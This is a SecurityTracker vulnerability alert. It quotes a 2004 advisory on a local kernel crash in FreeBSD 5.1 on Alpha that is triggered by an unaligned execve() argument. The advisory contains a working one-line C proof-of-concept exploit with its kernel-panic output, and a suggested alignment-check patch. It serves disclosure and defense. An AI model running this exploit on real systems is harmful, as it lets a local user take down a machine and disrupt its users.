FreeBSD execve() Unaligned Memory Parameter Lets Local Users Crash the System
|
|
SecurityTracker Alert ID: 1010583
|
|
SecurityTracker URL: http://securitytracker.com/id?1010583
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 25 2004
|
Impact: Denial of service via local system
|
Exploit Included: Yes
|
Version(s): 5.1; only some architectures are affected
|
Description: A vulnerability was reported in FreeBSD. A local user can cause the system to crash.
Marceta Milos reported that a local user can make a specially crafted execve() system call with an unaligned memory address as the
second or third argument to cause the kernel to crash.
According to the report, FreeBSD 5.1-RELEASE/Alpha is vulnerable but FreeBSD
5.1-RELEASE/IA32 is not.
The vendor was reportedly notified on June 19, 2004.
|
Impact: A local user can cause the system to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.freebsd.org/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: UNIX (FreeBSD)
|
Reported By: Marceta Milos <root@marcetam.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 23 Jun 2004 14:14:29 +0200
From: Marceta Milos <root@marcetam.net>
Subject: Security Advisory : FreeBSD local DoS
|
Security Advisory : FreeBSD local DoS
Systems affected:
FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable.
FreeBSD 5.1-RELEASE/IA32 is _not_ vulnerable.
Not sure about other FreeBSD/arch but they could be vulnerable too.
Risk: low
Date: 23 June 2004
Legal notice:
1. This Advisory is Copyright (c) 2004 Marceta Milos.
2. You may distribute it unmodified.
3. You may not modify it and distribute it or distribute
parts of it without the author's permission.
4. This document stays open for revision. Anything may
change without notice. For a possible update you may
visit author's homepage which should be redesigned soon.
Disclaimer:
I am not responsible for any damage caused by use
of the information provided in this document.
Description:
It is possible to crash kernel on FreeBSD/Alpha, by passing unaligned
memory address as a 2nd or 3rd argument to execve() syscall.
Condition:
To crash the system, first arg of execve() must point to accessible filename.
Demonstration code:
# cat kernkill.c
/*
* FreeBSD/Alpha local DoS
* by Marceta Milos
* root@marcetam.net
*/
char main() { execve("/bin/ls",(int *)(main + 1), 0); }
/* eof */
# gcc kernkill.c -okk
#./kk
fatal kernel trap:
trap entry = 0x4 (unaligned access fault)
cpuid = 0
faulting va = 0x120000891
opcode = 0x29
register = 0x0
pc = 0xfffffc0000651bf0
ra = 0xfffffc00004900e0
sp = 0xfffffe0039c3f840
usp = 0x11fffae0
curthread = 0xfffffc00620a3720
pid = 713, comm = kk
panic: trap
cpuid = 0;
syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231 231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...
Workaround:
You may make a proper use of ALIGNED_POINTER macro which already exists in
src/sys/alpha/include/param.h to check if ptrs are aligned, or make your
own like:
#define PTR_ALIGNED(x) (((x) & 0x7) == 0)
Putting the following line at the top of execve() in src/sys/kern/kern_exec.c
should prevent the crash (unfortunatly, this is not tested. Idea is mine, a
little corrected by Mr. Dag-Erling Smørgrav, FreeBSD deputy security officer):
if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
return (EFAULT);
Vendor status: FreeBSD was notified on Sat 19/06/2004 23:50 -0000
Greets to: LSD, teso, phenoelit, synnergy, thc, netric, scut, silvio, stinger && eSDee.
|
|
